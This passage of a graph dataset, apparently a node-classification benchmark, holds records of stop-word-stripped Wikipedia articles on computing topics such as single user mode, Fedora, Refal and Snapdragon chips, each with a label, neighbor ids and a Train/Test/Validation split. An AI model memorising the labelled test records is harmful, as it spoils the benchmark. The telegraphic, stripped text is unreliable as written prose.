    "text": "Single_user_mode:single user mode single user mode mode multiuser computer operating system boots single superuser mainly used maintenance multi-user environments network servers tasks may require exclusive access shared resources example running codice_1 network share mode also used security purposes network services run eliminating possibility outside interference systems lost superuser password changed switching single user mode asking password circumstances viewed security vulnerability unix-like operating systems provide single user mode functionality either system v-style runlevels bsd-style boot-loader options boot-time options run-level usually changed using codice_2 command runlevel 1 boot single user mode boot-loader options changed startup execution kernel freebsd dragonfly bsd changed rebooting system command codice_3 bootloader offers option bootup start single user mode solaris command codice_4 cause reboot single user mode macos users accomplish holding powering system user may required enter password set firmware os x el capitan later releases macos mode reversed single user mode command codice_5 terminal system fully rebooted single-user mode command codice_6 single user mode different safe mode boot system goes directly console instead starting core elements macos items codice_7 ignoring codice_8 codice_9 et al. users encouraged prompt run fsck command line utilities needed installed microsoft windows provides recovery console last known good configuration safe mode recently windows recovery environment standard recovery means also bootable bartpe-based third-party recovery discs available recovery console recovery discs different single user modes operating systems independent maintained operating system works like chrooting environment kernel linux",
    "neighbors": [
      866,
      9540,
      5256,
      6797,
      9709,
      7983,
      10896,
      5106,
      5397,
      5500,
      2811,
      700,
      2399
    ],
    "mask": "Test"
  },
  {
    "node_id": 5986,
    "label": 4,
    "text": "Cyber-collection:cyber-collection cyber-collection refers use cyber-warfare techniques order conduct espionage cyber-collection activities typically rely insertion malware targeted network computer order scan collect exfiltrate sensitive information cyber-collection started far back 1996 widespread deployment internet connectivity government corporate systems gained momentum since time numerous cases activity addition state sponsored examples cyber-collection also used organized crime identity e-banking theft corporate spies operation high roller used cyber-collection agents order collect pc smart-phone information used electronically raid bank accounts rocra aka red october collection system espionage hire operation organized criminals sell collected information highest bidder cyber-collection tools developed governments private interests nearly every computer smart-phone operating system tools known exist microsoft apple linux computers iphone android blackberry windows phones major manufacturers commercial off-the-shelf cots cyber collection technology include gamma group uk hacking team italy bespoke cyber-collection tool companies many offering cots packages zero-day exploits include endgame inc. netragard united states vupen france state intelligence agencies often teams develop cyber-collection tools stuxnet require constant source zero-day exploits order insert tools newly targeted systems specific technical details attack methods often sells six figure sums common functionality cyber-collection systems include several common ways infect access target cyber-collection agents usually installed payload delivery software constructed using zero-day attacks delivered via infected usb drives e-mail attachments malicious web sites state sponsored cyber-collections efforts used official operating system certificates place relying security vulnerabilities flame operation microsoft states microsoft certificate used impersonate windows update forged however experts believe may acquired humint efforts",
    "neighbors": [
      7424,
      3843,
      5764,
      10756,
      1544,
      5002,
      9233,
      8978,
      150,
      8726,
      8478,
      5024,
      7348,
      10935,
      7893,
      9688,
      7515,
      9440,
      3555,
      7652,
      7527,
      9460,
      8574
    ],
    "mask": "Train"
  },
  {
    "node_id": 5987,
    "label": 1,
    "text": "Ebean:ebean ebean object-relational mapping product written java designed simpler use understand jpa java persistence api jdo java data objects products ebean simpler api jpa achieves 'session less architecture ebean require jpa entitymanager jdo persistencemanager removes concepts detached/attached beans issues associated flushing/clearing 'session management entitymanagers adds make ebean api much easier learn understand use although ebean full orm features equivalent jpa also incorporated 'sql/relational features idea many development efforts require control exact sql calling stored procedures simply solved 'relational approaches ultimate goal ebean combine best orm features jpa best 'relational features products like mybatis single persistence framework ebean uses mapping jpa entity table onetomany etc annotations xml mapping entity beans compatible ebean jpa going beyond jpa ebean supports java generics fetching partial objects query object",
    "neighbors": [
      4358,
      3080,
      910,
      10526,
      5031,
      9896,
      5677,
      7983,
      7475,
      6074,
      10683,
      7485,
      5567,
      9665,
      6860,
      10573,
      3920,
      4960,
      2658,
      3560,
      3561,
      3562,
      5612,
      5872,
      8825,
      9078,
      3705,
      9467,
      3710,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 5988,
    "label": 2,
    "text": "Fedora_Project:fedora project fedora project project sponsored red hat primarily co-ordinate development linux-based fedora operating system operating vision project creates world free culture welcoming widespread collaboration commonplace people control content devices project also oversees extra packages enterprise linux special interest group maintains eponymous packages project founded 2003 result merger red hat linux rhl fedora linux projects red hat employees make 35 project contributors 2,000 contributors unaffiliated members community fedora project founded red hat decided split red hat linux red hat enterprise linux rhel community-based operating system fedora red hat professional workstation created time intention filling niche rhl filled created without certain future option quickly fell wayside non-enterprise rhl users favor fedora first edition fedora operating system—then known fedora core 1—was released november 6 2003 fedora community continues thrive fedora distribution reputation foss distribution focuses innovation close work upstream linux communities project current vision statement new october 2010 board worked synthesize ideas many different parts community concise statement 2017 board project leader matthew miller began work drafting updated mission statement august 2008 several fedora servers compromised upon investigation found one compromised servers used signing fedora update packages fedora project stated attacker get package signing key could used introduce malicious software onto fedora users systems update process project administrators performed checks software find anything suggest trojan horse introduced software precaution project converted new package signing keys fedora published full details march 30 2009 fedora project separate legal entity organization red hat retains liability actions fedora council currently top-level community leadership governance body council composed mix representatives different areas project named roles appointed red hat variable number seats connected medium-term project goals previous governance structure fedora board comprised five red hat appointed members five community-elected members additionally fedora project leader veto power board decision current model voting members block issues valid reason red hat one point announced intentions create separate fedora foundation govern project consideration variety issues canceled favor board model currently place community also involved organizing lower levels leadership fedora engineering steering committee fesco mindshare committee responsible technical community oversight respectively community-elected bodies manage significant portions project project facilitates online communication among developers community members public mailing lists wiki pages also coordinates two main events known fedora users developers conference fudcon flock flock fedora fudcon free software event held different locations two designated regions latin america asia/pacific typically revolves around combination conferencing social events hackathon flock similar event replaced fudcon north america europe/the middle east task-specific flexibly scheduled events known fedora activity days also gather many project contributors together various regions",
    "neighbors": [
      9353,
      1553,
      2974,
      7983,
      1075,
      823,
      9016,
      10172,
      10831,
      10961,
      11135,
      8539,
      5723,
      10971,
      4961,
      5096,
      4841,
      9455,
      4729,
      11643,
      6012,
      3582,
      4479
    ],
    "mask": "None"
  },
  {
    "node_id": 5989,
    "label": 2,
    "text": "AsteroidOS:asteroidos asteroidos open source operating system designed smartwatches available firmware replacement android wear devices motto asteroidos project hack wrist asteroidos built like embedded linux distribution openembedded works top linux kernel systemd service manager asteroidos also includes various mobile linux middlewares originally developed mer nemo mobile lipstick mce user interface completely written qt5 framework applications coded qml graphic components coming qt quick qml-asteroid sdk cross-compilation toolchain integrated qt creator generated openembedded easier development asteroid-launcher wayland compositor customizable home screen managing applications watchfaces notifications quick settings asteroid-launcher runs top libhybris compatibility layer make use bionic gpu drivers asteroidos offers bluetooth low energy synchronization capabilities asteroid-btsyncd daemon running top bluez5 reference client named asteroidos sync available android users 1.0 release following applications shipped pre-installed default asteroidos",
    "neighbors": [
      10658,
      1603,
      8262,
      8326,
      6508,
      7983,
      3248,
      5397,
      8122
    ],
    "mask": "Test"
  },
  {
    "node_id": 5990,
    "label": 2,
    "text": "NUbuntu:nubuntu nubuntu network ubuntu project take existing ubuntu operating system livecd full installer remaster tools needed penetration testing servers networks main idea keep ubuntu ease use mix popular penetration testing tools besides usage network server testing nubuntu made desktop distribution advanced linux users nubuntu uses light window manager fluxbox includes used security programs linux wireshark nmap dsniff ettercap april 4 2010 official website closed explanation list previous current releases",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      4500,
      5397,
      3478,
      4887,
      10394,
      8476,
      673,
      3745,
      5410,
      10530,
      6393,
      9253,
      10149,
      11305,
      7854,
      7983,
      8112,
      2738,
      2739,
      4790,
      823,
      439,
      56,
      59,
      10860,
      3903,
      10687,
      4673,
      3654,
      2375,
      4039,
      842,
      5962,
      8907,
      1107,
      1110,
      4951,
      7895,
      9693,
      3550,
      5343,
      4192,
      6625,
      2914,
      7140,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      9324,
      7534,
      2671,
      7920,
      8177,
      2930,
      5363,
      1396,
      3189,
      4085,
      9074,
      9461,
      5369,
      9971,
      5755,
      11388,
      8957
    ],
    "mask": "Test"
  },
  {
    "node_id": 5991,
    "label": 5,
    "text": "Internet_Protocol_Control_Protocol:internet protocol control protocol computer networking internet protocol control protocol ipcp network control protocol ncp establishing configuring internet protocol point-to-point protocol link ipcp responsible configuring ip addresses well enabling disabling ip protocol modules ends point-to-point link ipcp uses packet exchange mechanism link control protocol ipcp packets may exchanged ppp reached network-layer protocol phase ipcp packets received phase reached silently discarded ipcp ncp protocol code number 0x8021 two endpoints ppp connection must send ipcp configure request peer tcp/ip options independent direction ppp connection ppp endpoint request specific ip address peer also ask peer suggest ip address requesting address 0.0.0.0 peer sends suggestion ipcp nak packet first peer must subsequently request order complete negotiation practice protocols like pppoe commonly used home broadband connections latter method request suggestion nak suggestion request suggested address used set ip address isp client endpoint i.e customer-premises equipment former method request address used inform client isp endpoint ip provider edge equipment similar ncp ipv6 control protocol exists ipv6 used together ipcp ppp connection dual stack link interfacing newer older equipment n't support ipv6 one sees lcp protrej messages protocol 0x8057 side n't support ipv6cp configuration done link able carry ip data payload ppp frame code indicates ip data carried ipcp header code 8 bits. br specifies function performed identifier 8 bits used match requests replies length 16 bits. br size packet including header data variable length. br zero bytes data indicated length field may contain one options ipcp configuration options allow negotiatiation desirable internet protocol parameters ipcp uses configuration option format defined lcp link control protocol separate set options ipcp configuration options option 8 bits length 8 bits data variable length microsoft implementation common ipcp options include ip address ip addresses dns netbios name servers",
    "neighbors": [
      5472,
      4609,
      5991,
      8432,
      1618,
      2996,
      6649,
      5470
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5992,
    "label": 2,
    "text": "Marc_Rochkind:marc rochkind marc j. rochkind invented source code control system working bell labs well wrote advanced unix programming founded xvt software inc",
    "neighbors": [
      7666,
      515,
      2132,
      8991
    ],
    "mask": "None"
  },
  {
    "node_id": 5993,
    "label": 9,
    "text": "LispMe:lispme lispme interpreter scheme programming language developed fred bayer palm os pdas free software released gnu general public license reasonably close standard scheme fully r5rs compliant scheme source programs stored palm os memopad format scheme sessions stored palm os pdb database files interrupted restarted support palm os user interface primitives lispme also provides database support lispme sessions given starter icon appears applications menu enabling session run palm pilot application product ended development august 2008 fairly complete quite robust",
    "neighbors": [
      9714,
      10083,
      8262,
      7983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5994,
    "label": 7,
    "text": "CISPE_-_Cloud_Infrastructure_Services_Providers_in_Europe:cispe cloud infrastructure services providers europe cispe cloud infrastructure services providers europe trade association gathering infrastructure service iaas cloud providers express views european scale cispe non profit organisation registered belgium declared european union transparency register 041495920038-44 association started since iaas players difficulties make business model understood policy makers association aims advocate eu wide cloud first public procurement policy engage european digital single market including promotion high level security data protection rules/standards well avoiding vendor lock-in although association formally registered early 2017 operating since 2015 order help iaas providers customers reach compliance coming eu general data protection regulation gdpr enter force 25 may 2018 cispe released cispe data protection code conduct top required compliance meet gdpr code also ensures iaas customers may choose data located processed exclusively europe supplier re-use customer data compliance declared cisps/iaas providers service service cispe code conduct launched 27 september 2016 european parliament first 30 services declared first cisps/iaas providers 14 february 2017 announcements received large press coverage across europe including le monde infodsi el pais la repubblica silicon cloud magazine computer sweden tom hardware l'informaticien global security mag eu observer politico computer weekly iapp il corriere della sicurezza lemagit bloomberg tv itr manager heise.de cor.com zdnet eleconomista.es channel europapress 01net register cio dive many others members supportive organizations manage operations 15 european countries including france germany italy ireland uk finland sweden netherlands spain bulgaria poland switzerland companies members cispe and/or supporting code conduct includes arsys art automation aruba aws bit dada daticum dominion enter fasthosts fjordit gigas hetzner online home host europe group ids ikoula leaseweb lomaco netalia netcetera outscale ovh seeweb serverplan solidhost upcloud vtx xxl webhosting 1 1 internet cispe non profit association belgian law general assembly elects within members board less 10 members composition board directors time take account composition rules majority board composed european headquartered companies majority board composed small mid caps eur 1b turnover represent least 3 different eu countries considering worldwide hq location first chairman board alban schmutz general secretary named board first general secretary francisco mingorance board also names code conduct task force cispe cctf charge working evolution improvements cispe data protection code conduct organization open member operating least one iaas service one european country engaging declare least one service cispe code conduct within 6 months",
    "neighbors": [
      4429,
      9901
    ],
    "mask": "Test"
  },
  {
    "node_id": 5995,
    "label": 3,
    "text": "Balloon_Fight:balloon fight player controls unnamed balloon fighter two balloons attached helmet repeatedly pressing button holding b button causes balloon fighter flap arms rise air balloon popped player flotation decreased making harder rise life lost balloons popped enemy balloon fighters player falls water gets eaten large piranha near surface water hit lightning two modes play 1-player/2-player game goal clear screen enemies balloon trip goal avoid obstacles side-scrolling stage original arcade game include balloon trip level layouts completely different take advantage vertical scrolling addition minor gameplay differences defeat enemies screen clear stage mode played alone co-operatively second player player starts three extra lives 3ds balloon fight port comes download play option allows play along friend another 3ds system enemy balloon fighters float around screen player must hit balloons defeat enemy also fall water eaten fish flying close water surface enemy defeated falls water bubble rise screen hit extra points play progresses stages number enemies platforms increases every three stages bonus stage goal burst balloons float screen chimneys bottom single-player game goal avoid lightning sparks collect balloons aiming move ranks compete high score player starts one life home nintendo entertainment system version ported nec pc-8801 october 1985 sharp x1 november 1985 game boy advance balloon fight-e e-reader united states september 16 2002 part famicom mini series japan may 21 2004 also played animal crossing gamecube nintendo released game watch version name based nes version balloon trip mode protagonist balloon man unlike balloon fighters balloon men use rocket suits instead flapping hands elevate holding balloons sequel balloon fight called balloon kid released october 1990 north america january 31 1991 europe game boy expands game roots revamped full platforming adventure title released japan game boy colorized versions titled hello kitty world published character soft famicom balloon fight gb game boy color later released japan september 2001 game ported sharp zaurus series pdas balloon fighter flipper trophies obtainable super smash bros. melee flipper also usable item replacing bumper previous game balloon fighter considered playable role development super smash bros. melee ice climbers chosen instead original background music balloon trip balloon fight heard melee icicle mountain stage alternate music giant fish makes cameo appearance super smash bros. brawl appears ice climber-based stage summit tries attack players sea addition remixed version main theme titled balloon trip available summit stage well stickers balloon fighter balloon fight enemy collected brawl addition villager animal crossing series uses balloon fighter helmet one special moves super smash bros. nintendo 3ds wii u 3ds version game stage based balloon fight appears original 8-bit graphics stage returns super smash bros ultimate balloon fighter appears spirit said game warioware inc. series 9-volt games based balloon fight also minigame functioning three-dimensional version balloon trip players use wii remote microgame version also use nunchuk complete 3d balloon trip original tech demo yoshi touch go called yoshi balloon trip balloon fight theme touch mode tetris ds although mode almost nothing game music decorative graphics april 12 2007 club nintendo released tingle balloon fight nintendo ds exclusive game featuring tingle nintendo character originated legend zelda series game remake home version featuring balloon fight balloon trip modes levels expanded slightly utilize screens similar arcade game except based entirely around nes levels gallery contained concept art also included piece could unlocked completing specific in-game tasks balloon fighter appears super mario maker unlockable mystery mushroom costume part update balloon fight re-released part nintendo virtual console june 8 2007 balloon fight released europe followed release north america july 16 2007 japan november 12 2007 game released virtual console nintendo 3ds part system ambassador program september 2011 nintendo land attraction called balloon trip breeze similar balloon trip original balloon fight game released wii u virtual console service january 23 2013 north america february 23 2013 part promotion celebrating 30th anniversary release original nintendo famicom balloon fight became first wii u virtual console title released november 11 2016 game alongside 29 games included nes classic edition nintendo classic mini europe nes version balloon fight re-released one launch titles nintendo switch online september 18 2018",
    "neighbors": [
      1776,
      7281,
      10855
    ],
    "mask": "Test"
  },
  {
    "node_id": 5996,
    "label": 8,
    "text": "WS-Context:ws-context ws-context web services specification developed oasis organization part ws-caf suite purpose provide means reference shared context relates set interactions web services termed activity context provides details application-specific execution environment services typically included header soap message contexts may passed value reference case retrieved using context manager service context service described allows management activities means begin complete operations create destroy context respectively",
    "neighbors": [
      7878,
      489,
      4979,
      10486,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 5997,
    "label": 9,
    "text": "Refal:refal refal recursive functions algorithmic language functional programming language oriented toward symbolic computations including string processing language translation artificial intelligence one oldest members family first conceived 1966 theoretical tool first implementation appearing 1968 refal intended combine mathematical simplicity practicality writing large sophisticated programs one first functional programming languages unlike lisp time refal based pattern matching pattern matching works conjunction term rewriting basic data structure lisp prolog linear list built cons operation sequential manner thus n access list n th element refal lists built scanned ends pattern matching working nested lists well top-level one effect basic data structure refal tree rather list gives freedom convenience creating data structures using mathematically simple control mechanisms pattern matching substitution refal also includes feature called freezer support efficient partial evaluation refal applied processing transformation tree structures similarly xslt refal hello world example shown program includes two functions named go hello function written name function followed function body curly braces go function marked entry point program using entry directive one could think expressions function bodies function calls lisp-like syntax example hello function appears call built-in prout function string 'hello world argument meaning mechanism call however quite different illustrate difference consider following function determines whether string palindrome example shows function complex body consisting four sentences clauses sentence begins pattern followed equal sign followed general expression right hand side sentence terminated semicolon example pattern second sentence function s.1 expression true example shows patterns include pattern variables form character identifying type variable variable matches followed variable identifier variables begin match single symbol begin e match arbitrary expression variable identifier arbitrary alphanumeric sequence optionally separated type identifier dot function executes comparing argument patterns sentences order appear definition first pattern matches function replaces argument expression right hand side matched sentence result function application includes subexpression angle brackets third sentence example applied result processed refal invoking function identified first symbol brackets execution stops result angle brackets expand way function pal thus read informally expression empty replace true otherwise expression single symbol replace true otherwise expression symbol followed arbitrary expression e.2 followed symbol replace expression pal e.2 words throw away two identical symbols beginning end recurse otherwise replace expression false pattern e.1 always matches following three step-by-step execution traces annotated sentence numbers applied step produce next see hello world example fact executes sequence following expression transformations fact 0 1 0 matches 0 number produces 1 symbol number multiply result fact s.n 1 note prefix style operators fact s.n loop s.n 1 seen s.n acts loop counter equal function defined given two terms terms first clause matches produces true else second clause matches produces false important property refal functions refal single argument may decomposed terms expression defining control structures easy e1 evaluated expression entered matches 'true e1 else e2 e2 squeeze first clause matches whenever function squeeze encounters double blanks input expression replaces single blank second clause matches first one returns resultant value current expression squeeze",
    "neighbors": [
      9345,
      4101,
      8262,
      6502,
      11625,
      8430,
      502,
      10616
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5998,
    "label": 2,
    "text": "Nokia_E90_Communicator:nokia e90 communicator nokia e90 communicator 3g smartphone nokia fifth generation communicator also part eseries announced 11 february 2007 3gsm show barcelona succeeded nokia 9500 communicator unlike predecessors e90 runs s60 platform symbian os 3rd edition feature pack 1 v9.2 respectively previous communicators meanwhile based either geos symbian-based series 80 move common s60 good software compatibility get rid exclusive series 80 ui behaviours e90 also first communicator umts/hsdpa connectivity integrated gps features osgi ercp eclipse rcp embedded systems first nokia e90 unit sold auction jakarta indonesia 17 may 2007 rp 45,000,000 5,000 us indonesia one largest market share nokia communicator series cited reason unit first launch location early user-feedback reviews highlighted defect microphone communicator nokia initially denied existence defect nokia europe later acknowledged q3 earnings report released 18 october 2007 stated issue fully resolved replacement qwerty-ridden interface series 80 s60 software designed used one thumb criticised people communicator firmware version 7.40.1.2 released late october 2007 added support a-gps improved gps performance version also upgraded maps application communicator recent firmware version 400.34.93 free navigation program ovi maps also available communicator currently without free navigation",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      2208,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9163,
      9292,
      7246,
      1615,
      4305,
      5201,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      4576,
      1377,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      9964,
      109,
      8433,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 5999,
    "label": 3,
    "text": "NonStop_SQL:nonstop sql nonstop sql commercial relational database management system designed fault tolerance scalability currently offered hewlett packard enterprise latest version sql/mx 3.4 product originally developed tandem computers tandem acquired compaq 1997 compaq later acquired hewlett packard 2002 hewlett packard split 2015 hp inc. hewlett packard enterprise nonstop sql rest nonstop product line went hewlett packard enterprise product primarily used online transaction processing tailored organizations need high availability scalability database system typical users product stock exchanges telecommunications pos bank atm networks nonstop sql designed run effectively parallel computers adding functionality distributed data distributed execution distributed transactions first released 1987 second version 1989 added ability run queries parallel product became fairly famous one systems scales almost linearly number processors machine adding second cpu existing nonstop sql server almost exactly doubled performance second version added /mp name massively parallel third version nonstop sql/mx attempt tandem computers create product ansi sql compliant predecessor nonstop sql/mx shipped nonstop platform since 2002 access tables created nonstop sql/mp although native sql/mx tables offer ansi compliance many oracle-like enhancements hp neoview business intelligence platform built using nonstop sql origins nonstop sql/mx hp oltp database product parts neoview code base open-sourced 2014 name trafodion top-level apache project",
    "neighbors": [
      8229,
      1638,
      1606,
      8282,
      9677,
      10286,
      10413,
      4817,
      10389,
      9782,
      7802,
      6780
    ],
    "mask": "Test"
  },
  {
    "node_id": 6000,
    "label": 4,
    "text": "Internet_police:internet police internet police generic term police government agencies departments organizations charge policing internet number countries major purposes internet police depending state fighting cybercrime well censorship propaganda several attempts made introduce tools would allow law enforcement security agencies eavesdrop online communications without warrant latest bill c-30 tabled february 2012 abandoned strong public opposition computer emergency response team estonia cert estonia established 2006 organization responsible management security incidents .ee computer networks task assist estonian internet users implementation preventive measures order reduce possible damage security incidents help responding security threats cert estonia deals security incidents occur estonian networks started notified citizens institutions either estonia abroad cyber crime investigation cell wing mumbai police india deal computer crimes enforce provisions india information technology law namely information technology act 2000 various cyber crime related provisions criminal laws including indian penal code companies act india subsection it-sector responsibilities corporate measures protect cybersecurity cyber crime investigation cell part crime branch criminal investigation department mumbai police andhra pradesh cyber crime investigation cell wing hyderabad police india deal cyber crimes indian computer emergency response team cert-in also deals cyber security cyber police hi-tech crime enquire cell kerala police dutch police reported set internet brigade fight cybercrime allowed infiltrate internet newsgroups discussion forums intelligence gathering make pseudo-purchase provide services reported 2005 departments provincial municipal governments mainland china began creating teams internet commentators propaganda police departments offering classes marxism propaganda techniques internet reported guide discussion public bulletin boards away politically sensitive topics posting opinions anonymously false names chinese internet police also erase anti-communist comments posts pro-government messages chinese communist party leader hu jintao declared party intent strengthen administration online environment maintain initiative online opinion 2006 coup thailand thai police active monitoring silencing dissidents online censorship internet carried ministry information communications technology thailand royal thai police collaboration communications authority thailand telecommunication authority thailand 29 april 2010 wipas raksakulthai arrested charges lèse majesté following post facebook account criticizing king bhumibol may 2011 amnesty international named prisoner conscience internet watch foundation iwf recognised organisation united kingdom operating internet 'hotline public professionals report exposure potentially illegal content online works partnership police government public internet service providers wider online industry",
    "neighbors": [
      1169,
      9233,
      5531,
      1692,
      1317,
      1070,
      11695,
      10417,
      9909,
      4797,
      10303,
      2887,
      10446,
      4945,
      4435,
      5472,
      615,
      1650,
      7541,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 6001,
    "label": 3,
    "text": "List_of_Qualcomm_Snapdragon_systems-on-chip:list qualcomm snapdragon systems-on-chip list qualcomm snapdragon chips snapdragon family mobile system chip soc made qualcomm use smartphones tablets watches smartbook devices three types snapdragon s4 s4 play s4 plus s4 pro launched 2012 snapdragon s4 prime mpq8064 processor announced part snapdragon 600 series snapdragon 208 snapdragon 210 announced september 9 2014 snapdragon 212 announced july 28 2015 qualcomm 205 mobile platform formally falls mobile platform brand practically snapdragon 208 x5 lte modem announced march 20 2017 qualcomm 215 announced july 9 2019 snapdragon 410 announced december 9 2013 qualcomm first 64-bit mobile system chip snapdragon 412 announced july 28 2015 snapdragon 415 older snapdragon 425 later cancelled announced february 18 2015 snapdragon 425 427 430 435 pin software compatible software compatible snapdragon 429 439 450 625 626 632 snapdragon 430 announced september 15 2015 new snapdragon 425 snapdragon 435 announced february 11 2016 snapdragon 427 announced october 18 2016 snapdragon 450 announced june 28 2017 pin software compatible snapdragon 625 626 632 software compatible snapdragon 425 427 429 430 435 439 snapdragon 429 439 announced june 26 2018 snapdragon 429 439 pin software compatibility software compatible snapdragon 425 427 430 435 450 625 626 632 snapdragon 600 announced january 8 2013 snapdragon 610 snapdragon 615 announced february 24 2014 snapdragon 615 qualcomm first octa-core soc snapdragon 616 announced july 31 2015 snapdragon 617 announced september 15 2015 snapdragon 625 announced february 11 2016 snapdragon 626 announced october 18 2016 snapdragon 625 626 632 450 pin software compatible software compatible snapdragon 425 427 429 430 435 439 snapdragon 618 snapdragon 620 announced february 18 2015 since renamed snapdragon 650 snapdragon 652 respectively snapdragon 653 announced october 18 2016 snapdragon 630 636 660 pin software compatible snapdragon 630 snapdragon 660 announced may 9 2017 snapdragon 636 announced october 17 2017 snapdragon 632 announced june 26 2018 pin software compatible snapdragon 625 626 450 software compatible snapdragon 425 427 429 430 435 439 snapdragon 670 announced august 8 2018 pin software compatible snapdragon 710 snapdragon 675 announced october 22 2018 snapdragon 665 announced april 9 2019 february 27 2018 qualcomm introduces new snapdragon 700 mobile platform series snapdragon 710 announced may 23 2018 pin software compatible snapdragon 670 snapdragon 712 announced february 6 2019 snapdragon 730 730g announced april 9 2019 snapdragon 802 chip 8092 use smart tvs formerly announced qualcomm later confirmed released demand processors market smaller anticipated snapdragon 800 announced january 8 2013 snapdragon 801 announced february 24 2014. notable features snapdragon 805 announced november 20 2013 snapdragon 808 810 announced april 7 2014 snapdragon 808 notable features predecessor 805 snapdragon 810 notable features lower end 808 snapdragon 820 announced mobile world congress march 2015 first phones featuring soc released early 2016 snapdragon 821 announced july 2016 821 provides 10 improvement performance 820 due faster clocked cpu otherwise similar features qualcomm stating 821 designed complement rather replace 820. notable features predecessor snapdragon 808 810 snapdragon 835 announced november 17 2016 snapdragon 835 mobile compute platform windows 10 pcs announced december 5 2017. notable features predecessor 821 snapdragon 845 announced december 7 2017 snapdragon 845 notable features snapdragon 850 mobile compute platform windows 10 pcs announced june 4 2018 essentially over-clocked version snapdragon 845 snapdragon 855 announced december 5 2018 snapdragon 855 qualcomm first 7 nm finfet chipset notable features predecessor 845 snapdragon 8cx compute platform windows 10 pcs announced december 6 2018. notable features 855 snapdragon 855+ announced july 15 2019 different video codecs supported snapdragon socs decode e encode fhd fullhd 1080p 1920x1080px hd 720p 1366x768px 1280x720px different video codecs supported snapdragon 200 series different video codecs supported snapdragon 400 series different video codecs supported snapdragon 600 series different video codecs supported snapdragon 700 series different video codecs supported snapdragon 800 series qualcomm snapdragon wear 2100 processor designed smartwatches available connected 4g/lte 3g tethered bluetooth wi-fi versions lg watch style uses processor snapdragon wear 2500 announced june 26 2018 snapdragon wear 3100 announced september 10 2018 snapdragon 602a application motor industry announced january 6 2014 snapdragon 820a announced january 6 2016 snapdragon 410e embedded snapdragon 600e embedded announced september 28 2016 snapdragon 800 embedded snapdragon 810 embedded snapdragon 820e embedded announced february 21 2018 qualcomm vision intelligence platform announced april 11 2018 qualcomm vision intelligence platform purpose built bring powerful visual computing edge computing machine learning wide range iot devices qualcomm smart audio platform apq8009 apq8017 announced june 14 2017 qualcomm 212 home hub apq8009 qualcomm 624 home hub apq8053 announced january 9 2018 qcs400 series announced march 19 2019 may 2018 qualcomm announced snapdragon xr1 platform first purpose-built soc augmented reality virtual reality mixed reality qualcomm also announced htc vive pico meta vuzix would announcing consumer products featuring xr1 end 2018 following qualcomm acquisition csr 2015 qualcomm designs ultra-low-power bluetooth socs csr qca qcc brands wireless headphones earbuds qualcomm worked amazon google reference designs help manufactures develop headsets support alexa google assistant google fast pair qualcomm announced qcc5100 series ces 2018",
    "neighbors": [
      4609,
      3586,
      7170,
      8720,
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      1083,
      8253,
      7745,
      7235,
      7747,
      2635,
      1121,
      99,
      8812,
      11374,
      10361,
      638,
      644,
      9863,
      8842,
      146,
      659,
      1170,
      7833,
      666,
      5786,
      7835,
      4258,
      4773,
      9913,
      8383,
      10945,
      9928,
      4821,
      8921,
      2788,
      3301,
      9964,
      1776,
      6391,
      3835,
      2814,
      781,
      5417,
      810,
      2862,
      3380,
      7988,
      10548,
      11062,
      1849,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      9057,
      11629,
      6001,
      373,
      8058,
      2943,
      4995,
      392,
      398,
      1428,
      4508,
      10658,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      4569,
      2524,
      9182,
      10725,
      10223,
      1014,
      3575
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6002,
    "label": 8,
    "text": "Clean_URL:clean url clean urls also sometimes referred restful urls user-friendly urls search engine-friendly urls uniform resource locators urls intended improve usability accessibility website web service immediately intuitively meaningful non-expert users url schemes tend reflect conceptual structure collection information decouple user interface server internal representation information reasons using clean urls include search engine optimization seo conforming representational state transfer rest style software architecture ensuring individual web resources remain consistently url makes world wide web stable useful system allows durable reliable bookmarking web resources clean urls also contain implementation details underlying web application carries benefit reducing difficulty changing implementation resource later date example many urls include filename server-side script underlying implementation resource changed urls would need change along likewise urls clean site database moved restructured potential cause broken links internally external sites latter lead removal search engine listings use clean urls presents consistent location resources user-agents regardless internal structure potential benefit use clean urls concealment internal server application information improve security system url often comprise path script name query string query string parameters dictate content show page frequently include information opaque irrelevant users—such internal numeric identifiers values database illegibly-encoded data session ids implementation details clean urls contrast contain path resource hierarchy reflects logical structure users easily interpret manipulate implementation clean urls involves url mapping via pattern matching transparent rewriting techniques usually takes place server side clean url often form seen user search engine optimization purposes web developers often take opportunity include relevant keywords url remove irrelevant words common words removed include articles conjunctions descriptive keywords added increase user-friendliness improve search engine rankings fragment identifier included end clean url references within page need user-readable systems define slug part url identifies page human-readable keywords usually end part url interpreted name resource similar basename filename title page name based use word slug news media indicate short name given article internal use slugs typically generated automatically page title also entered altered manually page title remains designed display human readability slug may optimized brevity consumption search engines long page titles may also truncated keep final url reasonable length slugs may entirely lowercase accented characters replaced letters english alphabet whitespace characters replaced dash underscore avoid encoded punctuation marks generally removed also remove short common words conjunctions example original title outré collection would generated slug",
    "neighbors": [
      2945,
      10020,
      5641,
      7370,
      10506,
      10579,
      5012,
      2901,
      119,
      2936,
      7673,
      1723,
      5724,
      2558,
      8639
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6003,
    "label": 3,
